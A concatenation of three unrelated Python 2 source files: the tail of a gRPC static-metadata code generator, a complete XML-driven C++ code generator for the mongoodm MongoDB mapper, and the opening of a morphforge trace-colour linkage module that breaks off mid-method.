[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems)
print >> H, '''
namespace grpc_core {
extern StaticMetadata* g_static_mdelem_table;
extern grpc_mdelem* g_static_mdelem_manifested;
}
inline grpc_core::StaticMetadata* grpc_static_mdelem_table() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_mdelem_table != nullptr);
return grpc_core::g_static_mdelem_table;
}
inline grpc_mdelem* grpc_static_mdelem_manifested() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_mdelem_manifested != nullptr);
return grpc_core::g_static_mdelem_manifested;
}
'''
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
md_name = mangle(elem).upper()
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('#define %s (grpc_static_mdelem_manifested()[%d])' %
(md_name, i))
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def md_idx(m):
for i, m2 in enumerate(all_elems):
if m == m2:
return i
def offset_trials(mink):
yield 0
for i in range(1, 100):
for mul in [-1, 1]:
yield mul * i
def perfect_hash(keys, name):
p = perfection.hash_parameters(keys)
def f(i, p=p):
i += p.offset
x = i % p.t
y = i / p.t
return x + p.r[y]
return {
'PHASHNKEYS':
len(p.slots),
'pyfunc':
f,
'code':
"""
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
i %(offset_sign)s= %(offset)d;
uint32_t x = i %% %(t)d;
uint32_t y = i / %(t)d;
uint32_t h = x;
if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
uint32_t delta = (uint32_t)%(name)s_r[y];
h += delta;
}
return h;
}
""" % {
'name': name,
'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
't': p.t,
'offset': abs(p.offset),
'offset_sign': '+' if p.offset > 0 else '-'
}
}
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHNKEYS'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(intptr_t a, intptr_t b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(intptr_t a, intptr_t b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = static_cast<uint32_t>(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[elem_idxs[h]].data(), GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
batch_idx_of_hdr = '#define GRPC_BATCH_INDEX_OF(slice) \\'
static_slice = 'GRPC_IS_STATIC_METADATA_STRING((slice))'
slice_to_slice_ref = '(slice).refcount'
static_slice_ref_type = 'grpc_core::StaticSliceRefcount*'
slice_ref_as_static = ('reinterpret_cast<' + static_slice_ref_type + '>(' +
slice_to_slice_ref + ')')
slice_ref_idx = slice_ref_as_static + '->index'
batch_idx_type = 'grpc_metadata_batch_callouts_index'
slice_ref_idx_to_batch_idx = ('static_cast<' + batch_idx_type + '>(' +
slice_ref_idx + ')')
batch_invalid_idx = 'GRPC_BATCH_CALLOUTS_COUNT'
batch_invalid_u32 = 'static_cast<uint32_t>(' + batch_invalid_idx + ')'
# Assemble GRPC_BATCH_INDEX_OF(slice) macro as a join for ease of reading.
batch_idx_of_pieces = [
batch_idx_of_hdr, '\n', '(', static_slice, '&&', slice_ref_idx, '<=',
batch_invalid_u32, '?', slice_ref_idx_to_batch_idx, ':', batch_invalid_idx,
')'
]
print >> H, ''.join(batch_idx_of_pieces)
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[grpc_static_accept_encoding_metadata[(algs)]].data(), GRPC_MDELEM_STORAGE_STATIC))'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[grpc_static_accept_stream_encoding_metadata[(algs)]].data(), GRPC_MDELEM_STORAGE_STATIC))'
print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */'
H.close()
C.close()
|
|
#!/usr/bin/env python
"""Code generator of mongoodm"""
import sys
import os
import argparse
import string
import xml.etree.cElementTree
import inflection
import pprint
#Error codes
E_SUCCESS = 0
E_NOT_EXIST = 1
E_INVALID_ARGUMENT = 2
E_INSUFFICIENT_ARGUMENTS = 3
E_PARSE = 4
E_UNDEFINED = 5
E_INVALID_DIR = 6
E_INVALID_ENTITY = 7
E_INVALID_TYPE = 8
E_GENERATE_CODE = 9
# constants
__version__ = '0.1.0'
description = 'Code generator of mongoodm. Developed by Junheng Zang(junheng.zang@gmail.com).'
default_config_filename = 'db.xml'
gen_base_dir = "generated"
basic_data_type_dict = {
'int32': {
'field': 'mongoodm::Int32Field',
'value': 'mongoodm::Int32Value',
'raw_value_type': 'int32_t',
'setter_params': 'int32_t value',
'setter_args': 'value'
},
'uint32': {
'field': 'mongoodm::UInt32Field',
'value': 'mongoodm::UInt32Value',
'raw_value_type': 'uint32_t',
'setter_params': 'uint32_t value',
'setter_args': 'value'
},
'int64': {
'field': 'mongoodm::Int64Field',
'value': 'mongoodm::Int64Value',
'raw_value_type': 'int64_t',
'setter_params': 'int64_t value',
'setter_args': 'value'
},
'uint64': {
'field': 'mongoodm::UInt64Field',
'value': 'mongoodm::UInt64Value',
'raw_value_type': 'uint64_t',
'setter_params': 'uint64_t value',
'setter_args': 'value'
},
'bool': {
'field': 'mongoodm::BoolField',
'value': 'mongoodm::BoolValue',
'raw_value_type': 'bool',
'setter_params': 'bool value',
'setter_args': 'value'
},
'double': {
'field': 'mongoodm::DoubleField',
'value': 'mongoodm::DoubleValue',
'raw_value_type': 'double',
'setter_params': 'double value',
'setter_args': 'value'
},
'datetime': {
'field': 'mongoodm::DateTimeField',
'value': 'mongoodm::DateTimeValue',
'raw_value_type': 'time_t',
'setter_params': 'time_t value',
'setter_args': 'value'
},
'string': {
'field': 'mongoodm::StringField',
'value': 'mongoodm::StringValue',
'raw_value_type': 'std::string',
'setter_params': 'const std::string &value',
'setter_args': 'value'
},
'binary': {
'field': 'mongoodm::BinaryField',
'value': 'mongoodm::BinaryValue',
'raw_value_type': "std::string",
'setter_params': 'bson_subtype_t subtype, const std::string &data',
'setter_args': 'subtype, data'
},
'objectid': {
'field': 'mongoodm::ObjectIdField',
'value': 'mongoodm::ObjectIdValue',
'raw_value_type': 'std::string',
'setter_params': 'const std::string &value',
'setter_args': 'value'
}
}
document_h_field_number_def_template = '''\
${field_number_tag} = ${field_number},\
'''
document_h_basic_field_accessor_template = '''\
// ${field_name}
inline bool has_${field_name}() const { return has_bit(${field_number_tag}); }
void clear_${field_name}();
const ${field_value_class_name}* ${field_name}() const;
${field_value_class_name}& mutable_${field_name}();
'''
document_h_basic_field_raw_getter_template = '''\
inline ${field_value_raw_type} ${field_name}_value() const { return ${field_name}_->GetValue().GetValue(); }
'''
document_h_datetime_field_raw_getter_template = '''\
inline time_t ${field_name}_value() const { return ${field_name}_->GetValue().GetTime(); }
'''
document_h_basic_field_setter_template = '''\
inline void set_${field_name}(${field_setter_params}) { mutable_${field_name}().SetValue(${field_setter_args}); }
'''
document_h_datetime_field_setter_template = '''\
inline void set_${field_name}(time_t t) { mutable_${field_name}().SetTime(t); }
inline void set_${field_name}(struct timeval &tv) { mutable_${field_name}().SetTimeValue(tv); }
'''
document_cpp_basic_field_method_template = '''\
void ${class_name}::clear_${field_name}()
{
if (has_${field_name}()) {
clear_has_${field_name}();
DelField("${field_name}");
${field_name}_ = NULL;
}
}
const ${field_value_class_name}* ${class_name}::${field_name}() const
{
if (!has_${field_name}()) {
return NULL;
}
return &(${field_name}_->GetValue());
}
${field_value_class_name}& ${class_name}::mutable_${field_name}()
{
if (!has_${field_name}()) {
set_has_${field_name}();
${field_name}_= new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
return ${field_name}_->GetValue();
}
'''
document_h_array_field_accessor_template = '''\
// ${field_name}
inline bool has_${field_name}() const { return has_bit(${field_number_tag}); }
void clear_${field_name}();
int ${field_name}_size() const;
const ${array_member_class_name}* ${field_name}(size_t index) const;
${array_member_class_name}* mutable_${field_name}(size_t index);
${array_member_class_name}& add_${field_name}_member();
bool del_${field_name}_member(size_t index);
${field_value_class_name}* ${field_name}();
${field_value_class_name}& mutable_${field_name}();
'''
document_cpp_array_field_method_template = '''\
int ${class_name}::${field_name}_size() const
{
return has_${field_name}() ? ${field_name}_->GetValue().GetSize() : 0;
}
void ${class_name}::clear_${field_name}()
{
if (has_${field_name}()) {
clear_has_${field_name}();
DelField("${field_name}");
${field_name}_ = NULL;
}
}
const ${array_member_class_name}* ${class_name}::${field_name}(size_t index) const
{
if (!has_${field_name}()) {
return NULL;
}
return dynamic_cast<const ${array_member_class_name}*>(${field_name}_->GetValue().GetMember(index));
}
${array_member_class_name}* ${class_name}::mutable_${field_name}(size_t index)
{
if (!has_${field_name}()) {
return NULL;
}
return dynamic_cast<${array_member_class_name}*>(${field_name}_->GetValue().GetMember(index));
}
${array_member_class_name}& ${class_name}::add_${field_name}_member()
{
if (!has_${field_name}()) {
set_has_${field_name}();
${field_name}_ = new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
${array_member_class_name} *value = new ${array_member_class_name}();
${field_name}_->GetValue().AddMember(value, false);
return *value;
}
bool ${class_name}::del_${field_name}_member(size_t index)
{
if (!has_${field_name}()) {
return false;
}
return ${field_name}_->GetValue().DelMember(index);
}
${field_value_class_name}* ${class_name}::${field_name}()
{
if (!has_${field_name}()) {
return NULL;
}
return &(${field_name}_->GetValue());
}
${field_value_class_name}& ${class_name}::mutable_${field_name}()
{
if (!has_${field_name}()) {
set_has_${field_name}();
${field_name}_ = new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
return ${field_name}_->GetValue();
}
'''
document_h_field_bit_method_template = '''\
inline void set_has_${field_name}() { set_has_bit(${field_number_tag}); }
inline void clear_has_${field_name}() { clear_has_bit(${field_number_tag}); }\
'''
document_h_field_var_def_template = '''\
${field_class_name} *${field_name}_;\
'''
document_h_template = '''\
#ifndef ${header_guard}
#define ${header_guard}
#include <mongoodm/mongoodm.h>
${include_file_list}
${namespace_begin}
class ${class_name} : public mongoodm::Document
{
private:
enum {
${field_number_defs}
};
public:
${class_name}();
virtual ~${class_name}();
${class_name}(const ${class_name} &other) { CopyFrom(other); }
${class_name}& operator=(const ${class_name} &other) { CopyFrom(other); return *this; }
virtual void CopyFrom(const Value &other);
virtual Value* Clone() const { return new ${class_name}(*this); }
void Clear();
virtual int ParseField(const std::string &name, const rapidjson::Value &json_value);
${field_accessors}
private:
inline bool has_bit(unsigned int field_number) const
{
return (_has_bits_ & ((unsigned long long)1 << field_number)) != 0;
}
inline void set_has_bit(unsigned int field_number)
{
_has_bits_ |= ((unsigned long long)1 << field_number);
}
inline void clear_has_bit(unsigned int field_number)
{
_has_bits_ &= ~((unsigned long long)1 << field_number);
}
${field_bit_methods}
private:
${field_var_defs}
unsigned long long _has_bits_;
};
${namespace_end}
#endif // ${header_guard}
'''
document_cpp_template = '''\
#include "${h_filename}"
#define FIX_FIELD(field_name, field_class) \\
do {\\
if (has_##field_name()) {\\
field_name##_ = (field_class*)GetField(#field_name);\\
}\\
else {\\
field_name##_ = NULL;\\
}\\
} while (0)
#define HANDLE_FIELD(field_name, field_class) \\
do {\\
if (name.compare(#field_name) == 0) {\\
field_name##_ = new field_class(name);\\
if (field_name##_->FromJsonValue(json_value)) {\\
fields_.push_back(field_name##_);\\
set_has_##field_name();\\
return 1;\\
}\\
else {\\
delete field_name##_;\\
field_name##_ = NULL;\\
return -1;\\
}\\
}\\
} while (0)
${namespace_begin}
${class_name}::${class_name}()
: ${field_initiators}
, _has_bits_(0)
{
}
${class_name}::~${class_name}()
{
Clear();
}
void ${class_name}::CopyFrom(const Value &other)
{
if (this == &other) {
return;
}
Clear();
Document::CopyFrom(other);
if (is_null_) {
return;
}
const ${class_name} &doc = dynamic_cast<const ${class_name}&>(other);
_has_bits_ = doc._has_bits_;
${copyfrom_fix_fields_section}
}
void ${class_name}::Clear()
{
Document::Clear();
_has_bits_ = 0;
${clear_fields_section}
}
int ${class_name}::ParseField(const std::string &name, const rapidjson::Value &json_value)
{
${parsefield_handle_fields_section}
return 0;
}
${field_methods_impl}
${namespace_end}
'''
CMakeLists_template = '''\
project(%(project_name)s C CXX)
cmake_minimum_required(VERSION 2.8)
message(STATUS "PROJECT_SOURCE_DIR: ${PROJECT_SOURCE_DIR}")
# Possible values of CMAKE_BUILD_TYPE are empty, Debug, Release, RelWithDebInfo and MinSizeRel
set(CMAKE_BUILD_TYPE Debug)
message(STATUS "Build Type: " ${CMAKE_BUILD_TYPE})
set(EXECUTABLE_OUTPUT_PATH ${PROJECT_SOURCE_DIR})
message(STATUS "EXECUTABLE_OUTPUT_PATH: ${EXECUTABLE_OUTPUT_PATH}")
# mongodb C driver
find_package(PkgConfig)
pkg_check_modules(LIBMONGOC REQUIRED libmongoc-1.0)
include_directories(${LIBMONGOC_INCLUDE_DIRS})
# rapidjson
include_directories(${PROJECT_SOURCE_DIR}/thirdparty/rapidjson/include)
# mongoodm
set(MONGOODM_DIR ${PROJECT_SOURCE_DIR}/thirdparty/mongo_obj_doc_mapper)
set(MONGOODM_INCLUDE ${MONGOODM_DIR})
include_directories(${MONGOODM_INCLUDE})
set(SRCS %(srcs)s)
add_executable(%(exe_name)s ${SRCS} ${MONGOODM_DIR}/mongoodm/mongoodm_all.cpp)
set_target_properties(%(exe_name)s PROPERTIES OUTPUT_NAME %(exe_name)s)
target_link_libraries(myapp ${LIBMONGOC_LIBRARIES})
'''
def get_namespace_begin(namespace):
return '' if not namespace else '\nnamespace %s {\n' % namespace
def get_namespace_end(namespace):
return '' if not namespace else '\n} // namespace %s\n' % namespace
def get_header_guard(namespace, class_name):
return '%s_%s_H_' % (namespace.upper(), inflection.underscore(class_name).upper())
def construct_embeded_document_type_name(*args):
return '_'.join(args)
def get_field_number_tag(field_name):
return 'k%sFieldNumber' % inflection.camelize(field_name)
def parse_document(document_element, document_type_name, is_embeded, documents):
print 'Parsing document %s...' % document_type_name
#xml.etree.cElementTree.dump(document_element)
if 'skip' in document_element.attrib and document_element.attrib['skip'] == 'true':
print 'Skipped'
return True
document = {}
document['name'] = document_type_name
document['is_embeded'] = is_embeded
document['fields'] = []
for field_element in document_element.findall('field'):
field = {}
if 'name' not in field_element.attrib:
print 'document %s field no name attribute' % document['name']
return False
field['name'] = field_element.attrib['name']
#print 'Parsing %s.%s...' % (document['name'], field['name'])
if 'type' not in field_element.attrib:
print 'document %s field no type attribute' % document['name']
return False
field['type'] = field_element.attrib['type']
if field['type'] == 'document':
if 'ref' in field_element.attrib:
field['ref'] = field_element.attrib['ref']
elif len(field_element) > 0:
field['ref'] = construct_embeded_document_type_name(document['name'], field['name'])
parse_document(field_element, field['ref'], True, documents)
else:
print 'document %s field %s undefined document type' % (document['name'], field['name'])
return False
if field['ref'] in basic_data_type_dict:
field['value_class_name'] = basic_data_type_dict[field['ref']]['value']
else:
field['value_class_name'] = field['ref']
field['class_name'] = 'mongoodm::GenericField<%s>' % field['value_class_name']
field['raw_value_type'] = field['value_class_name']
elif field['type'] == 'array':
if 'ref' in field_element.attrib:
field['ref'] = field_element.attrib['ref']
elif len(field_element) > 0:
field['ref'] = construct_embeded_document_type_name(document['name'], field['name'], 'Member')
parse_document(field_element, field['ref'], True, documents)
else:
print 'document %s field %s unknown array member type' % (document['name'], field['name'])
return False
if field['ref'] in basic_data_type_dict:
field['array_member_class_name'] = basic_data_type_dict[field['ref']]['value']
else:
field['array_member_class_name'] = field['ref']
field['class_name'] = 'mongoodm::ArrayField<%s>' % field['array_member_class_name']
field['value_class_name'] = 'mongoodm::GenericArrayValue<%s>' % field['array_member_class_name']
else:
field['value_class_name'] = basic_data_type_dict[field['type']]['value']
field['class_name'] = basic_data_type_dict[field['type']]['field']
field['raw_value_type'] = basic_data_type_dict[field['type']]['raw_value_type']
field['setter_params'] = basic_data_type_dict[field['type']]['setter_params']
field['setter_args'] = basic_data_type_dict[field['type']]['setter_args']
document['fields'].append(field)
documents[document['name']] = document
#pprint.pprint(document)
return True
def parse_documents(document_elements):
if not document_elements:
print 'database no document elements'
return {}
documents = {}
for document_element in document_elements:
if 'name' not in document_element.attrib:
print 'document no name attribute'
return False
document_name = inflection.camelize(document_element.attrib['name'])
assert parse_document(document_element, document_name, False, documents), 'Parsing document failed: %s' % document_element
return documents
def parse(filename):
"""Entry point of config file parser"""
if not os.access(filename, os.R_OK):
print 'File "%s" does not exist or you do not have read permission' % filename
return None
db = {}
tree = xml.etree.cElementTree.parse(filename);
root = tree.getroot()
assert root.tag == 'database'
if 'name' not in root.attrib:
print 'database no name attribute'
return None
db['name'] = root.attrib['name']
db['namespace'] = ''
if 'namespace' in root.attrib:
db['namespace'] = root.attrib['namespace']
db['documents'] = parse_documents(root.findall("document"))
return db
def generate_document_code(document, namespace, output_dir, is_overwrite_mode):
print 'Generating document %s...' % document['name']
document['class_name'] = document['name']
document['h_filename'] = '%s.h' % inflection.underscore(document['name'])
document['cpp_filename'] = '%s.cpp' % inflection.underscore(document['name'])
document['h_filename'] = '%s.h' % document['name'].lower()
document['cpp_filename'] = '%s.cpp' % document['name'].lower()
index = 0
include_files = []
field_number_defs = []
field_accessors = []
field_bit_methods = []
field_var_defs = []
for field in document['fields']:
# include_files
if field['type'] not in basic_data_type_dict:
if field['type'] != 'array' or field['ref'] not in basic_data_type_dict:
include_files.append('#include "%s.h"' % field['ref'].lower())
# field_number_defs
field_number_def = string.Template(document_h_field_number_def_template).substitute(
field_number_tag=get_field_number_tag(field['name']),
field_number=index)
index += 1
field_number_defs.append(field_number_def)
# field_accessors
if field['type'] == 'array':
field_accessor = string.Template(document_h_array_field_accessor_template).substitute(
field_name=field['name'],
field_value_class_name=field['value_class_name'],
array_member_class_name=field['array_member_class_name'],
field_number_tag=get_field_number_tag(field['name']))
else:
field_accessor = string.Template(document_h_basic_field_accessor_template).substitute(
field_name=field['name'],
field_value_class_name=field['value_class_name'],
field_number_tag=get_field_number_tag(field['name']))
if field['type'] == 'datetime':
field_accessor += string.Template(document_h_datetime_field_raw_getter_template).substitute(
field_name=field['name'])
elif field['type'] in basic_data_type_dict and field['type'] not in ('document', 'binary'):
field_accessor += string.Template(document_h_basic_field_raw_getter_template).substitute(
field_name=field['name'],
field_value_raw_type=field['raw_value_type'])
# field setter
if field['type'] == 'datetime':
field_accessor += string.Template(document_h_datetime_field_setter_template).substitute(
field_name=field['name'])
elif field['type'] in basic_data_type_dict and field['type'] != 'document':
field_accessor += string.Template(document_h_basic_field_setter_template).substitute(
field_name=field['name'],
field_setter_params=field['setter_params'],
field_setter_args=field['setter_args'])
field_accessors.append(field_accessor)
# field_bit_methods
field_bit_methods.append(string.Template(document_h_field_bit_method_template).substitute(
field_name=field['name'],
field_number_tag=get_field_number_tag(field['name'])))
# field_var_defs
field_var_defs.append(string.Template(document_h_field_var_def_template).substitute(
field_name=field['name'],
field_class_name=field['class_name']))
document_h_pathname = os.path.join(output_dir, document['h_filename'])
if os.path.exists(document_h_pathname) and not is_overwrite_mode:
print 'File %s exists' % document_h_pathname
return False, document['cpp_filename']
document_h_content = string.Template(document_h_template).substitute(
namespace_begin=get_namespace_begin(namespace),
namespace_end=get_namespace_end(namespace),
header_guard=get_header_guard(namespace, document['class_name']),
include_file_list='\n'.join(include_files),
class_name=document['class_name'],
field_number_defs='\n'.join(field_number_defs),
field_accessors='\n'.join(field_accessors),
field_bit_methods='\n'.join(field_bit_methods),
field_var_defs='\n'.join(field_var_defs))
with open(document_h_pathname, 'w') as f_header:
f_header.write(document_h_content)
print '%s generated' % document_h_pathname
document_cpp_pathname = os.path.join(output_dir, document['cpp_filename'])
if os.path.exists(document_cpp_pathname) and not is_overwrite_mode:
print 'File %s exists' % document_cpp_pathname
return False, document['cpp_filename']
field_initiators_list = []
copyfrom_fix_fields_list = []
clear_fields_list = []
parsefield_handle_fields_list = []
field_methods_impl_list = []
for field in document['fields']:
field_initiators_list.append('%s_(NULL)' % field['name'])
copyfrom_fix_fields_list.append(' FIX_FIELD(%s, %s);' % (field['name'], field['class_name']))
clear_fields_list.append('\t%s_ = NULL;' % field['name'])
parsefield_handle_fields_list.append(' HANDLE_FIELD(%s, %s);' % (field['name'], field['class_name']))
if field['type'] != 'array':
field_methods_impl_list.append(string.Template(document_cpp_basic_field_method_template).substitute(
class_name=document['class_name'],
field_name=field['name'],
field_class_name=field['class_name'],
field_value_class_name=field['value_class_name']))
else:
field_methods_impl_list.append(string.Template(document_cpp_array_field_method_template).substitute(
class_name=document['class_name'],
field_name=field['name'],
field_class_name=field['class_name'],
field_value_class_name=field['value_class_name'],
array_member_class_name=field['array_member_class_name']))
document_cpp_content = string.Template(document_cpp_template).substitute(
namespace_begin=get_namespace_begin(namespace),
namespace_end=get_namespace_end(namespace),
h_filename=document['h_filename'],
class_name=document['class_name'],
field_initiators='\n\t, '.join(field_initiators_list),
copyfrom_fix_fields_section='\n'.join(copyfrom_fix_fields_list),
clear_fields_section='\n'.join(clear_fields_list),
parsefield_handle_fields_section='\n'.join(parsefield_handle_fields_list),
field_methods_impl='\n'.join(field_methods_impl_list))
with open(document_cpp_pathname, 'w') as f_source:
f_source.write(document_cpp_content)
print '%s generated' % document_cpp_pathname
return True, document['cpp_filename']
def generate_CMakeLists(db, output_dir, is_overwrite_mode, src_list):
CMakeLists_pathname = os.path.join(output_dir, 'CMakeLists.txt')
if os.path.exists(CMakeLists_pathname) and not is_overwrite_mode:
print 'File %s exists' % CMakeLists_pathname
return False
CMakeLists_content = CMakeLists_template % dict(
project_name='myapp',
exe_name='myapp',
srcs=' '.join(src_list))
with open(CMakeLists_pathname, 'w') as f:
f.write(CMakeLists_content)
print '%s generated' % CMakeLists_pathname
return True
def generate_code(db, output_dir, is_overwrite_mode):
src_list = []
for document_name, document in db['documents'].iteritems():
is_successful, src_file_name = generate_document_code(document, db['namespace'], output_dir, is_overwrite_mode)
if not is_successful:
return False
src_list.append(src_file_name)
if not generate_CMakeLists(db, output_dir, is_overwrite_mode, src_list):
return False
print 'done!'
return True
def main():
arg_parser = argparse.ArgumentParser(description=description)
arg_parser.add_argument('--version', action='version', version='%(prog)s ' + __version__, help='version number')
arg_parser.add_argument('-o', '--output', default='.', help='output directory')
arg_parser.add_argument('--overwrite', action='store_true', help='if overwrite existing code files')
arg_parser.add_argument('db_config', default=default_config_filename, action='store', help='database config file name')
args = arg_parser.parse_args()
print 'Database config file: %s' % args.db_config
print 'Output directory: %s' % os.path.abspath(args.output)
print 'Overwrite mode: %s' % args.overwrite
if not os.path.exists(args.output):
os.makedirs(args.output)
print 'Parsing config file %s ...' % args.db_config
dbcfg = parse(args.db_config)
if not dbcfg:
return E_PARSE
print 'Generating code ...'
if not generate_code(dbcfg, os.path.abspath(args.output), args.overwrite):
return E_GENERATE_CODE
return 0
if __name__ == "__main__":
sys.exit(main())
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
import re
from collections import defaultdict
from itertools import chain
import __builtin__ as bi
def _get_collision_of_color_index_for_group(colorIndex, group, plotspec_to_traces_dict, allocated_trace_colors):
collisions = 0
for (_ps, ps_traces) in plotspec_to_traces_dict.iteritems():
ps_allocated_indices = [allocated_trace_colors.get(tr, None) for tr in ps_traces ]
ps_allocated_indices = [a for a in ps_allocated_indices if a is not None]
clashes = ps_allocated_indices.count(colorIndex)
# Does this group have anything that would go into this plot-spec?
# If not, then it doesn't matter about collisions!
n_group_in_ps = set(group) & set(ps_traces)
if len(n_group_in_ps) > 0:
collisions += clashes
return collisions + 1
class LinkageRule(object):
def __call__(self, all_traces):
"""returns a sequence of tuples, containing the traces that are connected to each other"""
raise NotImplementedError()
class LinkageRuleTagRegex(object):
def __init__(self, regex):
self.regex = re.compile(regex, re.VERBOSE)
def get_match_tags(self, tr):
matches = []
for tag in tr.tags:
if self.regex.match(tag):
matches.append(tag)
return matches
def __call__(self, all_traces):
grps = defaultdict(list)
for trace in all_traces:
match_tags = self.get_match_tags(trace)
for matchtag in match_tags:
grps[matchtag].append(trace)
return grps.values()
from morphforge.traces.tags import TagSelector
class LinkageRuleTag(object):
def __init__(self, tagselector, preferred_color=None):
if isinstance(tagselector, basestring):
self._tagselector = TagSelector.from_string(tagselector)
else:
self._tagselector = tagselector
self.preferred_color = preferred_color
def match(self, trace):
return self._tagselector(trace)
def __call__(self, all_traces):
matches = [trace for trace in all_traces if self.match(trace)]
if len(matches) in [0, len(all_traces)]:
assert False, 'All or none selected, an error has probably been made! (%s)' % (self._tagselector)
return [matches]
class AbstrLinkage(object):
""" Linkage classes are used to choose colours for TagViewer plots.
They are called 'linkages' beacuse they make links between traces across
different plots. For example, supposing we have graphs of membrane voltage,
and current flows, then we may wish to specify that all the traces of
Neuron1 are in blue and all those of Neuron2 are in green.
"""
def process(self, plotspec_to_traces_dict):
""" Preprocessing of linkages before plotting.
TagViewer will assign traces to the plotspecs, then call this function
"""
raise NotImplementedError()
def get_trace_color(self, trace):
"""Returns the colour code for the *trace"""
raise NotImplementedError()
#class ColorAssigner(object):
# def __init__(self, color_rules):
# self._color_rules = color_rules
class StandardLinkages(object):
def __init__(self, linkages_explicit=None, linkage_rules=None, color_rules=None):
self._linkages_explicit = linkages_explicit or []
self._color_cycle = ['blue', 'green', 'red', 'cyan', 'yellow', 'black']
self.linkage_rules = (linkage_rules if linkage_rules else [])
self._color_allocations = None
self._color_assigner = (color_rules if color_rules else [])
def get_trace_color(self, tr):
